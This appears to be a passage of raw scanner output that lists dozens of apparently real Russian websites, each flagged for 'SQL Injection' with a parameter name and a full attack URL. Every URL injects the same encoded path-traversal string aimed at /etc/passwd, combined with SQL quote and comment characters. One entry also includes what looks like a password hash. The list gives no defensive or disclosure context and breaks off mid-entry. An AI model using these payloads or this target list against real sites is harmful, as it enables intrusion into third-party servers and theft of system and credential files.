  1040. Vulnerability URL: http://www.bbtravel.ru/index.php?id_parent=2&page_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1041.  
  1042.  
  1043. Type: SQL Injection
  1044. Protocol: http
  1045. Verb: get
  1046. Parameter: id_parent
  1047. Vulnerability URL: http://www.bbtravel.ru/index.php?id_parent=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&page_id=95
  1048.  
  1049.  
  1050. Type: SQL Injection
  1051. Protocol: http
  1052. Verb: get
  1053. Parameter: id
  1054. Vulnerability URL: http://www.bemnw.ru/?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&module=articles
  1055.  
  1056.  
  1057. Type: SQL Injection
  1058. Protocol: http
  1059. Verb: get
  1060. Parameter: productID
  1061. Vulnerability URL: http://www.bezkrotov.ru/index.php?productID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1062.  
  1063.  
  1064. Type: SQL Injection
  1065. Protocol: http
  1066. Verb: get
  1067. Parameter: returnto
  1068. Vulnerability URL: http://www.billiardvideo.ru/login.php?returnto=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1069.  
  1070.  
  1071. Type: SQL Injection
  1072. Protocol: http
  1073. Verb: get
  1074. Parameter: pageid
  1075. Vulnerability URL: http://www.bobrov.ru/?pageid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1076.  
  1077.  
  1078. Type: SQL Injection
  1079. Protocol: http
  1080. Verb: get
  1081. Parameter: id
  1082. Vulnerability URL: http://www.bumbum.ru/dop.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1083.  
  1084.  
  1085. Type: SQL Injection
  1086. Protocol: http
  1087. Verb: get
  1088. Parameter: menu
  1089. Vulnerability URL: http://www.caravaning.ru/main.php?menu=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&recid=6
  1090.  
  1091.  
  1092. Type: SQL Injection
  1093. Protocol: http
  1094. Verb: get
  1095. Parameter: recid
  1096. Vulnerability URL: http://www.caravaning.ru/main.php?menu=misc&recid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1097.  
  1098.  
  1099. Type: SQL Injection
  1100. Protocol: http
  1101. Verb: get
  1102. Parameter: idx
  1103. Vulnerability URL: http://www.candy.ru/product_folder.asp?idx=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1104.  
  1105.  
  1106. Type: SQL Injection
  1107. Protocol: http
  1108. Verb: get
  1109. Parameter: idx
  1110. Vulnerability URL: http://www.candy.ru/product_folder.asp?idx=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1111.  
  1112.  
  1113. Type: SQL Injection
  1114. Protocol: http
  1115. Verb: get
  1116. Parameter: category
  1117. Vulnerability URL: http://www.converse.ru/shop?category=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1118.  
  1119.  
  1120. Type: SQL Injection
  1121. Protocol: http
  1122. Verb: get
  1123. Parameter: id
  1124. Vulnerability URL: http://www.clavel-trade.ru/catalog2.php?page=4&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1125.  
  1126.  
  1127. Type: SQL Injection
  1128. Protocol: http
  1129. Verb: get
  1130. Parameter: page
  1131. Vulnerability URL: http://www.clavel-trade.ru/catalog2.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=0005
  1132.  
  1133.  
  1134. Type: SQL Injection
  1135. Protocol: http
  1136. Verb: get
  1137. Parameter: _pagename
  1138. Vulnerability URL: http://www.delos.nnov.ru/items.php?_pagename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1139.  
  1140.  
  1141. Type: SQL Injection
  1142. Protocol: http
  1143. Verb: get
  1144. Parameter: id
  1145. Vulnerability URL: http://www.chopper-bike.ru/view_customzone.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1146.  
  1147.  
  1148. Type: SQL Injection
  1149. Protocol: http
  1150. Verb: get
  1151. Parameter: id_rubric
  1152. Vulnerability URL: http://www.delta-print.ru/catalogue?id_rubric=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1153.  
  1154.  
  1155. Type: SQL Injection
  1156. Protocol: http
  1157. Verb: get
  1158. Parameter: sidyokyok
  1159. Vulnerability URL: http://www.dnz-store.ru/index.php?sidyokyok=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1160.  
  1161.  
  1162. Type: SQL Injection
  1163. Protocol: http
  1164. Verb: get
  1165. Parameter: id_kino
  1166. Vulnerability URL: http://www.docdvd.ru/deatail.php?id_kino=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&pw=%241%24nHu6EWwy%24YRYXDLAGBA2coebuocrc0
  1167.  
  1168.  
  1169. Type: SQL Injection
  1170. Protocol: http
  1171. Verb: get
  1172. Parameter: id
  1173. Vulnerability URL: http://www.doctor-gynecolog.ru/index.phtml?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1174.  
  1175.  
  1176. Type: SQL Injection
  1177. Protocol: http
  1178. Verb: get
  1179. Parameter: categoryID
  1180. Vulnerability URL: http://www.dom-zdorovja.ru/categorylist.php?categoryID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1181.  
  1182.  
  1183. Type: SQL Injection
  1184. Protocol: http
  1185. Verb: get
  1186. Parameter: id
  1187. Vulnerability URL: http://www.domnaru.ru/rss.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1188.  
  1189.  
  1190. Type: SQL Injection
  1191. Protocol: http
  1192. Verb: get
  1193. Parameter: tid
  1194. Vulnerability URL: http://www.doska.gold-fond.ru/?tid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1195.  
  1196.  
  1197. Type: SQL Injection
  1198. Protocol: http
  1199. Verb: get
  1200. Parameter: cat
  1201. Vulnerability URL: http://www.doska.stroyart.ru/informer_1.php?c=1&cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&gor=27&vg=g
  1202.  
  1203.  
  1204. Type: SQL Injection
  1205. Protocol: http
  1206. Verb: get
  1207. Parameter: gor
  1208. Vulnerability URL: http://www.doska.stroyart.ru/informer_1.php?c=1&cat=16&gor=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&vg=g
  1209.  
  1210.  
  1211. Type: SQL Injection
  1212. Protocol: http
  1213. Verb: get
  1214. Parameter: catid
  1215. Vulnerability URL: http://www.drive-direct.ru/?go=servis&catid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1216.  
  1217.  
  1218. Type: SQL Injection
  1219. Protocol: http
  1220. Verb: get
  1221. Parameter: kod
  1222. Vulnerability URL: http://www.e-rospechat.ru/catalog.php?action=add&topic=000213&ltr=%CA&pos=0&kod=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1223.  
  1224.  
  1225. Type: SQL Injection
  1226. Protocol: http
  1227. Verb: get
  1228. Parameter: id_parent
  1229. Vulnerability URL: http://www.ecopol.ru/index.php?id_page=3&id_item=186&id_parent=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id_catalog=164
  1230.  
  1231.  
  1232. Type: SQL Injection
  1233. Protocol: http
  1234. Verb: get
  1235. Parameter: id_item
  1236. Vulnerability URL: http://www.ecopol.ru/index.php?id_page=3&id_item=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id_parent=2&id_catalog=164
  1237.  
  1238.  
  1239. Type: SQL Injection
  1240. Protocol: http
  1241. Verb: get
  1242. Parameter: ortupg
  1243. Vulnerability URL: http://www.ecopolymery.ru/index.php?ortupg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1244.  
  1245.  
  1246. Type: SQL Injection
  1247. Protocol: http
  1248. Verb: get
  1249. Parameter: tema1
  1250. Vulnerability URL: http://www.egetrener.ru/view_tema1.php?tema1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1251.  
  1252.  
  1253. Type: SQL Injection
  1254. Protocol: http
  1255. Verb: get
  1256. Parameter: searchkeyword
  1257. Vulnerability URL: http://www.etwinternational.ru/productslist.aspx?searchkeyword=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1258.  
  1259.  
  1260. Type: SQL Injection
  1261. Protocol: http
  1262. Verb: get
  1263. Parameter: an
  1264. Vulnerability URL: http://www.excellent.ru/index.php?an=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1265.  
  1266.  
  1267. Type: SQL Injection
  1268. Protocol: http
  1269. Verb: get
  1270. Parameter: id
  1271. Vulnerability URL: http://www.expo.chita.ru/expo?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1272.  
  1273.  
  1274. Type: SQL Injection
  1275. Protocol: http
  1276. Verb: get
  1277. Parameter: razdel
  1278. Vulnerability URL: http://www.fasad-profil.ru/?razdel=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&p=catalog
  1279.  
  1280.  
  1281. Type: SQL Injection
  1282. Protocol: http
  1283. Verb: get
  1284. Parameter: username
  1285. Vulnerability URL: http://www.flyd.ru/users.html?username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&service=viewprofile
  1286.  
  1287.  
  1288. Type: SQL Injection
  1289. Protocol: http
  1290. Verb: get
  1291. Parameter: cat
  1292. Vulnerability URL: http://www.fshopkurs.ru/view_moidisk.php?cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1293.  
  1294.  
  1295. Type: SQL Injection
  1296. Protocol: http
  1297. Verb: get
  1298. Parameter: page
  1299. Vulnerability URL: http://www.fssc.ru/?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1300.  
  1301.  
  1302. Type: SQL Injection
  1303. Protocol: http
  1304. Verb: get
  1305. Parameter: folder_id
  1306. Vulnerability URL: http://www.gearlock.ru/index.php?folder_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&clr=black&level=12
  1307.  
  1308.  
  1309. Type: SQL Injection
  1310. Protocol: http
  1311. Verb: get
  1312. Parameter: razdel
  1313. Vulnerability URL: http://www.governors.ru/?razdel=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&region=30&regmode=regions&statja=59130
  1314.  
  1315.  
  1316. Type: SQL Injection
  1317. Protocol: http
  1318. Verb: get
  1319. Parameter: region
  1320. Vulnerability URL: http://www.governors.ru/?razdel=main&region=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&regmode=regions&statja=59130
  1321.  
  1322.  
  1323. Type: SQL Injection
  1324. Protocol: http
  1325. Verb: get
  1326. Parameter: article_id
  1327. Vulnerability URL: http://www.grandprix-magazine.ru/index.php?action=magazine_archive&article_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1328.  
  1329.  
  1330. Type: SQL Injection
  1331. Protocol: http
  1332. Verb: get
  1333. Parameter: p
  1334. Vulnerability URL: http://www.hrmonitor.ru/index.php?theme_id=4&pname=news&p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1335.  
  1336.  
  1337. Type: SQL Injection
  1338. Protocol: http
  1339. Verb: get
  1340. Parameter: personnel_id
  1341. Vulnerability URL: http://www.iaclub.ru/index.php?op=viewpersonnel&personnel_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&mod=antology
  1342.  
  1343.  
  1344. Type: SQL Injection
  1345. Protocol: http
  1346. Verb: get
  1347. Parameter: pageID
  1348. Vulnerability URL: http://www.intimsshop.ru/?pageID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1349.  
  1350.  
  1351. Type: SQL Injection
  1352. Protocol: http
  1353. Verb: get
  1354. Parameter: id
  1355. Vulnerability URL: http://www.isras.ru/publ.html?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1356.  
  1357.  
  1358. Type: SQL Injection
  1359. Protocol: http
  1360. Verb: get
  1361. Parameter: cat_id
  1362. Vulnerability URL: http://www.istok-m.ru/catalog?cat_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&act=list
  1363.  
  1364.  
  1365. Type: SQL Injection
  1366. Protocol: http
  1367. Verb: get
  1368. Parameter: sid
  1369. Vulnerability URL: http://www.istra-portal.ru/organisations.php?sid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1370.  
  1371.  
  1372. Type: SQL Injection
  1373. Protocol: http
  1374. Verb: get
  1375. Parameter: qnum
  1376. Vulnerability URL: http://www.itest.ru/keirsey.php?question=0&qnum=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1377.  
  1378.  
  1379. Type: SQL Injection
  1380. Protocol: http
  1381. Verb: get
  1382. Parameter: r
  1383. Vulnerability URL: http://www.iwonna.ru/index.php?p=1&r=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1384.  
  1385.  
  1386. Type: SQL Injection
  1387. Protocol: http
  1388. Verb: get
  1389. Parameter: p
  1390. Vulnerability URL: http://www.iwonna.ru/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&r=2
  1391.  
  1392.  
  1393. Type: SQL Injection
  1394. Protocol: http
  1395. Verb: get
  1396. Parameter: pid
  1397. Vulnerability URL: http://www.kentek.ru/index.php3?pid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cid=9
  1398.  
  1399.  
  1400. Type: SQL Injection
  1401. Protocol: http
  1402. Verb: get
  1403. Parameter: cid
  1404. Vulnerability URL: http://www.kentek.ru/index.php3?pid=10&cid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1405.  
  1406.  
  1407. Type: SQL Injection
  1408. Protocol: http
  1409. Verb: get
  1410. Parameter: productID
  1411. Vulnerability URL: http://www.kofi.ru/index.php?productID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1412.  
  1413.  
  1414. Type: SQL Injection
  1415. Protocol: http
  1416. Verb: get
  1417. Parameter: auth
  1418. Vulnerability URL: http://www.kurginyan.ru/publ.shtml?cmd=art&id=1908&auth=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1419.  
  1420.  
  1421. Type: SQL Injection
  1422. Protocol: http
  1423. Verb: get
  1424. Parameter: id
  1425. Vulnerability URL: http://www.kurginyan.ru/publ.shtml?cmd=art&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&auth=10
  1426.  
  1427.  
  1428. Type: SQL Injection
  1429. Protocol: http
  1430. Verb: get
  1431. Parameter: UID
  1432. Vulnerability URL: http://www.kuzzbas.ru/print.php?UID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1433.  
  1434.  
  1435. Type: SQL Injection
  1436. Protocol: http
  1437. Verb: get
  1438. Parameter: razdelID
  1439. Vulnerability URL: http://www.lagunatravels.ru/index.php?razdelID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1440.  
  1441.  
  1442. Type: SQL Injection
  1443. Protocol: http
  1444. Verb: get
  1445. Parameter: k
  1446. Vulnerability URL: http://www.linkinform.ru/file.php?k=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1447.  
  1448.  
  1449. Type: SQL Injection
  1450. Protocol: http
  1451. Verb: get
  1452. Parameter: id
  1453. Vulnerability URL: http://www.m-posm.ru/catalog?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1454.  
  1455.  
  1456. Type: SQL Injection
  1457. Protocol: http
  1458. Verb: get
  1459. Parameter: action
  1460. Vulnerability URL: http://www.madcms.ru/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&com=post&cat=1
  1461.  
  1462.  
  1463. Type: SQL Injection
  1464. Protocol: http
  1465. Verb: get
  1466. Parameter: com
  1467. Vulnerability URL: http://www.madcms.ru/?action=all&com=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cat=1
  1468.  
  1469.  
  1470. Type: SQL Injection
  1471. Protocol: http
  1472. Verb: get
  1473. Parameter: cat
  1474. Vulnerability URL: http://www.madcms.ru/?action=all&com=post&cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1475.  
  1476.  
  1477. Type: SQL Injection
  1478. Protocol: http
  1479. Verb: get
  1480. Parameter: menu_id
  1481. Vulnerability URL: http://www.magotboga.ru/index.php?menu_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1482.  
  1483.  
  1484. Type: SQL Injection
  1485. Protocol: http
  1486. Verb: get
  1487. Parameter: path
  1488. Vulnerability URL: http://www.master-key.ru/index.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&mod=page
  1489.  
  1490.  
  1491. Type: SQL Injection
  1492. Protocol: http
  1493. Verb: get
  1494. Parameter: category
  1495. Vulnerability URL: http://www.mcalpine.ru/catalog?action=show_categories&category=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1496.  
  1497.  
  1498. Type: SQL Injection
  1499. Protocol: http
  1500. Verb: get
  1501. Parameter: cat_s_id
  1502. Vulnerability URL: http://www.mebelofitaly.ru/?s_id=2821&cat_s_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1503.  
  1504.  
  1505. Type: SQL Injection
  1506. Protocol: http
  1507. Verb: get
  1508. Parameter: mtype
  1509. Vulnerability URL: http://www.medtechgroup.ru/view_catalog.php?mtype=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1510.  
  1511.  
  1512. Type: SQL Injection
  1513. Protocol: http
  1514. Verb: get
  1515. Parameter: id
  1516. Vulnerability URL: http://www.medy.ru/pages.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1517.  
  1518.  
  1519. Type: SQL Injection
  1520. Protocol: http
  1521. Verb: get
  1522. Parameter: products_id
  1523. Vulnerability URL: http://www.megaprosto.ru/?products_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1524.  
  1525.  
  1526. Type: SQL Injection
  1527. Protocol: http
  1528. Verb: get
  1529. Parameter: nav
  1530. Vulnerability URL: http://www.messervice.ru/main.php?nav=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1531.  
  1532.  
  1533. Type: SQL Injection
  1534. Protocol: http
  1535. Verb: get
  1536. Parameter: cat
  1537. Vulnerability URL: http://www.mir-tech.ru/select.php?cat_num=1020&cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1538.  
  1539.  
  1540. Type: SQL Injection
  1541. Protocol: http
  1542. Verb: get
  1543. Parameter: cat_num
  1544. Vulnerability URL: http://www.mir-tech.ru/select.php?cat_num=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&cat=10
  1545.  
  1546.  
  1547. Type: SQL Injection
  1548. Protocol: http
  1549. Verb: get
  1550. Parameter: for
  1551. Vulnerability URL: http://www.mobu.ru/download.php?id=1434&for=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1552.  
  1553.  
  1554. Type: SQL Injection
  1555. Protocol: http
  1556. Verb: get
  1557. Parameter: id
